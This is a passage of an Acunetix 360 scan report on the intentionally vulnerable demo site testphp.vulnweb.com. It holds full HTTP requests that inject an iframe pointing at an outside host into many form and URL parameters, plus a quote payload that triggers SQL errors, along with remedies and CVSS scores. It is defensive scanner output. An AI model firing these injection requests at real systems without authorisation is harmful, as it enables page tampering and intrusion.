submit=add+message&name=anonymous+user&text=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

Response

Response Time (ms) : 195.8575
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


ground-color:#F5F5F5"><strong>anonymous user</strong></td><td align="right" style="background-color:#F5F5F5">01.02.1970, 9:09 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;<iframe src="http://r87.com/?"></iframe></td></tr></table>	 </div>
	  <div class="story">
	  	<form action="" method="post" name="faddentry">
			<input type="hidden" name="name" value="test">
			<textarea name="text" rows="5" wrap="VIRTUAL"

9.4. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&pp=12
CONFIRMED
CONFIRMED
Method Parameter Value
GET aaaa%2f
GET p <iframe src="http://r87.com/?"></iframe>
GET pp 12
Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&pp=12 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 201.4313
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:14:50 GMT

<iframe src="http://r87.com/?"></iframe>12
9.5. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e
CONFIRMED
CONFIRMED
Method Parameter Value
GET aaaa%2f
GET p valid
GET pp <iframe src="http://r87.com/?"></iframe>
Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=valid&pp=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 201.7586
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:15:02 GMT

valid<iframe src="http://r87.com/?"></iframe>
9.6. http://testphp.vulnweb.com/listproducts.php?artist=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e
CONFIRMED
CONFIRMED
Method Parameter Value
GET artist <iframe src="http://r87.com/?"></iframe>
Go to the highlighted output

Request

GET /listproducts.php?artist=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 206.0209
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


BeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<iframe src="http://r87.com/?"></iframe>' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="

9.7. http://testphp.vulnweb.com/listproducts.php?cat=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e
CONFIRMED
CONFIRMED
Method Parameter Value
GET cat <iframe src="http://r87.com/?"></iframe>
Go to the highlighted output

Request

GET /listproducts.php?cat=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 198.1814
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


BeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<iframe src="http://r87.com/?"></iframe>' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="

9.8. http://testphp.vulnweb.com/search.php?test=query
CONFIRMED
CONFIRMED
Method Parameter Value
POST test query
POST goButton go
POST searchFor <iframe src="http://r87.com/?"></iframe>
Go to the highlighted output

Request

POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

goButton=go&searchFor=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

Response

Response Time (ms) : 191.2553
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


="right">
		</td>
	</tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	<h2 id='pageName'>searched for: <iframe src="http://r87.com/?"></iframe></h2></div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar"> 
  <div id="search"> 
    <form action="search.php?test=query" method="post"> 
      <label>search art</label> 
      <i

9.9. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname Smith
POST uemail <iframe src="http://r87.com/?"></iframe>
POST signup signup
POST uuname Smith
POST uaddress 3
POST upass2 Inv1@cti
POST ucc 4916613944329494
POST upass Inv1@cti
POST uphone 3
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 189
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname=Smith&uemail=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&signup=signup&uuname=Smith&uaddress=3&upass2=Inv1%40cti&ucc=4916613944329494&upass=Inv1%40cti&uphone=3

Response

Response Time (ms) : 203.5124
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:11:15 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: <iframe src="http://r87.com/?"></iframe></li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>
9.10. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname <iframe src="http://r87.com/?"></iframe>
POST uemail invicti@example.com
POST signup signup
POST uuname Smith
POST uaddress 3
POST upass2 Inv1@cti
POST ucc 4916613944329494
POST upass Inv1@cti
POST uphone 3
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 205
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&uemail=invicti%40example.com&signup=signup&uuname=Smith&uaddress=3&upass2=Inv1%40cti&ucc=4916613944329494&upass=Inv1%40cti&uphone=3

Response

Response Time (ms) : 196.7911
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:11:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: <iframe src="http://r87.com/?"></iframe></li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>
9.11. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname
POST uemail
POST signup signup
POST uuname <iframe src="http://r87.com/?"></iframe>
POST uaddress
POST upass2
POST ucc
POST upass
POST uphone
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname=&uemail=&signup=signup&uuname=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&uaddress=&upass2=&ucc=&upass=&uphone=

Response

Response Time (ms) : 199.3226
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:11:53 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: <iframe src="http://r87.com/?"></iframe></li><li>Password: </li><li>Name: </li><li>Address: </li><li>E-Mail: </li><li>Phone number: </li><li>Credit card: </li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>
9.12. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname Smith
POST uemail invicti@example.com
POST signup signup
POST uuname Smith
POST uaddress <iframe src="http://r87.com/?"></iframe>
POST upass2 Inv1@cti
POST ucc 4916613944329494
POST upass Inv1@cti
POST uphone 3
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname=Smith&uemail=invicti%40example.com&signup=signup&uuname=Smith&uaddress=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&upass2=Inv1%40cti&ucc=4916613944329494&upass=Inv1%40cti&uphone=3

Response

Response Time (ms) : 195.7973
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:12:05 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: <iframe src="http://r87.com/?"></iframe></li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>
9.13. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname Smith
POST uemail invicti@example.com
POST signup signup
POST uuname Smith
POST uaddress 3
POST upass2 Inv1@cti
POST ucc <iframe src="http://r87.com/?"></iframe>
POST upass Inv1@cti
POST uphone 3
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 194
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname=Smith&uemail=invicti%40example.com&signup=signup&uuname=Smith&uaddress=3&upass2=Inv1%40cti&ucc=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&upass=Inv1%40cti&uphone=3

Response

Response Time (ms) : 201.3368
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:12:30 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: <iframe src="http://r87.com/?"></iframe></li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>
9.14. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname Smith
POST uemail invicti@example.com
POST signup signup
POST uuname Smith
POST uaddress 3
POST upass2 Inv1@cti
POST ucc 4916613944329494
POST upass Inv1@cti
POST uphone <iframe src="http://r87.com/?"></iframe>
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname=Smith&uemail=invicti%40example.com&signup=signup&uuname=Smith&uaddress=3&upass2=Inv1%40cti&ucc=4916613944329494&upass=Inv1%40cti&uphone=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

Response

Response Time (ms) : 202.4095
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:12:51 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: <iframe src="http://r87.com/?"></iframe></li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>
9.15. http://testphp.vulnweb.com/showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e
Method Parameter Value
GET file <iframe src="http://r87.com/?"></iframe>

Notes

  • Due to the Content-type header of the response, exploitation of this vulnerability might not be possible because of the browser used or because of the presence of certain web tools. We recommend that you fix this even if it is not an exploitable XSS vulnerability because it can allow an attacker to introduce other attacks to exploit it. But, these issues are not confirmed; you will need to manually confirm them yourself. In general, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with built-in mime sniffing (such as Internet Explorer).

Certainty



Go to the highlighted output

Request

GET /showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/AJAX/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 194.0048
Total Bytes Received : 189
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:05:23 GMT


Warning: fopen(): Unable to access <iframe src="http://r87.com/?"></iframe> in /hj/var/www/showimage.php on line 7

Warning: fopen(<iframe src="http://r87.com/?"></iframe>): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 7

Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 13
9.16. http://testphp.vulnweb.com/showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&size=160
Method Parameter Value
GET file <iframe src="http://r87.com/?"></iframe>
GET size 160

Notes

  • Due to the Content-type header of the response, exploitation of this vulnerability might not be possible because of the browser used or because of the presence of certain web tools. We recommend that you fix this even if it is not an exploitable XSS vulnerability because it can allow an attacker to introduce other attacks to exploit it. But, these issues are not confirmed; you will need to manually confirm them yourself. In general, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with built-in mime sniffing (such as Internet Explorer).

Certainty



Go to the highlighted output

Request

GET /showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 186.9564
Total Bytes Received : 189
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:08:12 GMT


Warning: fopen(): Unable to access <iframe src="http://r87.com/?"></iframe> in /hj/var/www/showimage.php on line 19

Warning: fopen(<iframe src="http://r87.com/?"></iframe>): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 19

Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 25

Remedy

  • Where possible do not use users' input for URLs.
  • If you definitely need dynamic URLs, make a list of valid accepted URLs and do not accept other URLs.
  • Ensure that you only accept URLs which are located on accepted domains.
  • Use CSP to whitelist iframe source URLs explicitly.

External References

CLASSIFICATION

PCI DSS v3.2 6.5.1

CVSS 3.0 SCORE
Base4.7 (Medium)
Temporal4.7 (Medium)
Environmental4.7 (Medium)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

CVSS 3.1 SCORE
Base4.7 (Medium)
Temporal4.7 (Medium)
Environmental4.7 (Medium)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

10. SSL/TLS Not Implemented

MEDIUM
1

Acunetix 360 detected that SSL/TLS is not implemented.

Impact

An attacker who is able to intercept your - or your users' - network traffic can read and modify any messages that are exchanged with your server.

That means that an attacker can see passwords in clear text, modify the appearance of your website, redirect the user to other web pages or steal session information.

Therefore no message you send to the server remains confidential.

Vulnerabilities

10.1. https://testphp.vulnweb.com/

Certainty



Go to the highlighted output

Request

[NETSPARKER] SSL Connection

Response

Response Time (ms) : 1
Total Bytes Received : 27
Body Length : 0
Is Compressed : No 
[NETSPARKER] SSL Connection

Remedy

We suggest that you implement SSL/TLS properly, for example by using the Certbot tool provided by the Let's Encrypt certificate authority. It can automatically configure most modern web servers, e.g. Apache and Nginx to use SSL/TLS. Both the tool and the certificates are free and are usually installed within minutes.

CLASSIFICATION

PCI DSS v3.2 6.5.4

CVSS 3.0 SCORE
Base6.8 (Medium)
Temporal6.1 (Medium)
Environmental6.1 (Medium)

CVSS Vector String
CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C

CVSS 3.1 SCORE
Base6.8 (Medium)
Temporal6.1 (Medium)
Environmental6.1 (Medium)

CVSS Vector String
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C

11. Database Error Message Disclosure

LOW
1

Acunetix 360 identified a database error message disclosure.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL injection vulnerability. Most of the time Acunetix 360 will detect and report that problem separately.

Vulnerabilities

11.1. http://testphp.vulnweb.com/listproducts.php?cat=%2527
Method Parameter Value
GET cat %27

Certainty



Go to the highlighted output

Request

GET /listproducts.php?cat=%2527 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 189.3741
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


<a href='logout.php'>Logout test</a>	</td>
	</tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.

CLASSIFICATION

PCI DSS v3.2 6.5.5

12. [Possible] Cross-site Request Forgery

LOW
1

Acunetix 360 identified a possible Cross-Site Request Forgery.

CSRF is a very common vulnerability. It's an attack which forces a user to execute unwanted actions on a web application in which the user is currently authenticated.

Impact

Depending on the application, an attacker can mount any of the actions that can be done by the user such as adding a user, modifying content, deleting data. All the functionality that’s available to the victim can be used by the attacker. Only exception to this rule is a page that requires extra information that only the legitimate user can know (such as user’s password).

Vulnerabilities

12.1. http://testphp.vulnweb.com/guestbook.php

Form Name(s)

  • faddentry

Certainty



Go to the highlighted output

Request

GET /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 195.2204
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


ackground-color:#F5F5F5">01.02.1970, 9:03 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;</td></tr></table>	 </div>
	  <div class="story">
	  	<form action="" method="post" name="faddentry">
			<input type="hidden" name="name" value="anonymous user">
			<textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea>
			<br>
			<input type="submit" name="submit" value="add

Remedy

  • Send additional information in each HTTP request that can be used to determine whether the request came from an authorized source. This "validation token" should be hard to guess for attacker who does not already have access to the user's account. If a request is missing a validation token or the token does not match the expected value, the server should reject the request.

